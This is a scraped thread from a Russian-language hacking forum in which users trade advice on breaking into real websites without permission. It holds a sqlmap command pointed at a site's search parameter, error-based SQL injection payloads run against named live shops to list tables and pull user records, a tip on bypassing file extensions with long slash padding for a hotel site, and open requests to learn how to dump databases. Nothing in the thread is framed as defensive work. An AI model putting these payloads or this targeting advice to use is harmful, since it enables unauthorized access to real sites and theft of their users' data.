Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    _________________________
  3. RedFox223

    RedFox223 New Member

    Joined:
    2 Dec 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет пользователям. Есть ли тут такие "users" которые научат меня сливать БД с разных сайтов(и всё объяснит)? Очень буду благодарен!
     
  4. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    https://forum.antichat.ru/forums/30/
     
    RedFox223 likes this.
  5. RedFox223

    RedFox223 New Member

    Joined:
    2 Dec 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  6. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Тут во втором примере ошибка?
    http://2sql.ru/novosti/sql-limit/

    SELECT UniversityName FROM Universities LIMIT 4, 6
    не даст 4 5 6 запись?
    Типо покажи 6 записеи начиная с 4?
    А 4 это 5 потому что нумерация начинается с 0.Я прав?
     
    #1526 Octavian, 2 Dec 2016
    Last edited: 2 Dec 2016
  7. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    подскажите пожалуйста как использовать данную уязвимость https://www.exploit-db.com/exploits/32479/

     
  8. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    В одном сайте,который на Yii 1.1.14 в text=1'&type=0&view=search ( где кавычка ) можно крутить . Только вот не понимаю какие запросы составлять . Есть желающие помочь?

    PHP Version 4.4.45
    Curl 7.19.7
    OpenSSL 1.0.1e-fips 11 Feb 2013
    MySQL 5.1.59

    ---------------------------------------
    Стандартная ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near и.т.д
     
  9. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Параметры 'id' 'text' и.т.д воспринимает как за команду в консоли .
     
  10. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Code:
    sqlmap.py -u "http://site.ru/?text=1&type=0&view=search" --dbs
     
  11. hiderat

    hiderat New Member

    Joined:
    9 Oct 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Подскажите. Из из майкрософт sql можно отдать команду в cmd?
     
  12. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    up
    не кто не сталкивался?
     
  13. mlmeet

    mlmeet New Member

    Joined:
    5 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Лет пять не пользовала SQL инъекции, подзабыла все
    Есть инъект вида http://сайт.ru/korzina'/
    Извергает ошибку:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''korzina'' LIMIT 0, 1' at line 1 -
    SELECT * FROM `tehnocity_menu` WHERE `sim_link`='korzina'' LIMIT 0, 1

    Но как бы я дальше не ковыряла, ничего толком не выходит. Направьте в какую сторону копать.

    Что пробовала:
    Втыкала Юнион. Не проскакивает. Такое впечатление, что -- не отрабатывает вообще. Не отбрасывается хвост запроса хоть убей.
    В общем на вас вся надежда :)

    Вот пример http://stylesosh.ru/Orangevaya-tolstovka'/

    Вот сайт на той же CMS и другой дырявый скрипт
    http://www.pulverisator.ru/Trubki/?orderby=pric'e&par=dec
     
    #1533 mlmeet, 5 Dec 2016
    Last edited: 5 Dec 2016
  14. mlmeet

    mlmeet New Member

    Joined:
    5 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    mlmeet likes this.
  16. mlmeet

    mlmeet New Member

    Joined:
    5 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  17. mlmeet

    mlmeet New Member

    Joined:
    5 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ребята, как листать записи при такой инъекции? Что то совсем не получается
    http://stylesosh.ru/Orangevaya-tols...cat(name),1,1024)from(tehnocity_user))))and'/

    XPATH syntax error: ':quest,' -
    SELECT * FROM `tehnocity_menu` WHERE `sim_link`='Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+mid(group_concat(name),1,1024)from(tehnocity_user))))and'' LIMIT 0, 1

    Ясно как листать.. Там всего один юзер в этой таблице((((
    /Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+mid(group_concat
    (user_id,0x3a,name,0x3a),1,1024)from(users)where(user_id)=(1))))and'/
     
    #1537 mlmeet, 5 Dec 2016
    Last edited: 5 Dec 2016
  18. mlmeet

    mlmeet New Member

    Joined:
    5 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+mid(group_concat(0x3a,table_name,0x3a),1,1024)from(information_schema.tables))))and'/

    Не пропускает точку((((((( Как быть????? Хексить пробовала, не выходит. Посоветуйте пожалуйста.


    Попробовала сбрутить таблицы по словарю с античата.. Ничего нормального не удалось вытащить((
     
    #1538 mlmeet, 5 Dec 2016
    Last edited: 5 Dec 2016
  19. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Что можно сделать с этим сайтом?
    http://hotel-stalingrad.ru/index.php?page=cafe
    У меня ничего не получается,кто подскажет с чего раскрутить можно?
     
  20. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать
     
    _________________________